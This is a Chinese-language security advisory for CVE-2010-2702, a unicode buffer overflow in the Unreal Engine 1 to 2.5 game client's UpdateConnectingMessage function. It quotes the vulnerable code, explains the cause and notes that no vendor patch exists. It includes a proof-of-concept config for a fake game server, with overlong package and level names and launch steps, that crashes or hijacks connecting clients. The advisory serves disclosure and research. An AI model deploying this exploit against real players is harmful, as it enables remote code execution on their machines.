发布日期：2010-07-06
更新日期：2010-07-08

受影响系统：

Epic Games Unreal Engine 2.5
Epic Games Unreal Engine 2
Epic Games Unreal Engine 1

描述：

---

BUGTRAQ  ID: 41424
CVE ID: CVE-2010-2702

Unreal引擎是一款被很多游戏使用的网络游戏引擎。

Unreal引擎客户端在下载或尝试下载服务器上所使用的缺失软件包期间UpdateConnectingMessage函数中存在unicode缓冲区溢出漏洞：

  void UGameEngine::UpdateConnectingMessage()
  {
      if(GPendingLevel && Players.Num() && Players(0)->Actor)
      {
          if(Players(0)->Actor->ProgressTimeOut < Players(0)->Actor->Level->TimeSeconds)
          {
              TCHAR Msg1[256], Msg2[256];
              appSprintf( Msg1, *LocalizeProgress(TEXT("ConnectingText"),TEXT("Engine")) );
              appSprintf( Msg2, *LocalizeProgress(TEXT("ConnectingURL"),TEXT("Engine")), *GPendingLevel->URL.Host, *GPendingLevel->URL.Map );
              SetProgress( Msg1, Msg2, 60.f );
          }
      }
  }

溢出的起因是appSprintf是最多为1024字节的_vsnwprintf的封装程序，而目标缓冲区仅为256字节。

客户端必须启用了下载（[IpDrv.TcpNetDriver]->AllowDownloads=True）才会受这个漏洞影响，而默认下大多数游戏都启用了这个设置。

<*来源：Luigi Auriemma （aluigi@pivx.com）
  
  链接：http://secunia.com/advisories/40466/
        http://aluigi.altervista.org/adv/unrealcbof-adv.txt
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

// Unreal engine <= 2.5 clients unicode buffer-overflow in UpdateConnectingMessage
// by Luigi Auriemma
// e-mail: aluigi@autistici.org
// web:    aluigi.org
//
// Advisory:
// http://aluigi.org/adv/unrealcbof-adv.txt
//
// - http://aluigi.org/testz/unrealts.zip
// - launch it: unrealts 7777 unrealcbof.txt
// - launch a game based on the Unreal engine
// - open the console (~)
// - type: open 127.0.0.1:7777
// - it's also possible to launch directly the game: game.exe 127.0.0.1:7777

// CHALLENGE can be random
CHALLENGE CHALLENGE=12345678

// GUID can be random
USES GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF PKG=bof FLAGS=1 SIZE=1 FNAME=bof

// some games like SWAT4 require that LEVEL of WELCOME and this PKG are the same
USES GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF PKG=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxxxxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA FLAGS=1 SIZE=1 FNAME=bof

// enable any possible type of download
DLMGR CLASS=Engine.ChannelDownload PARAMS=Enabled COMPRESSION=0
DLMGR CLASS=IpDrv.HTTPDownload PARAMS=http://127.0.0.1/ COMPRESSION=0

// LEVEL must contain the overflow and shellcode (the UDP packet must be max 576 bytes or less for some games)
WELCOME LEVEL=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxxxxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA LONE=0

建议：

---

厂商补丁：

Epic Games
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.epicgames.com/

浏览次数：2115
严重程度：0（网友投票）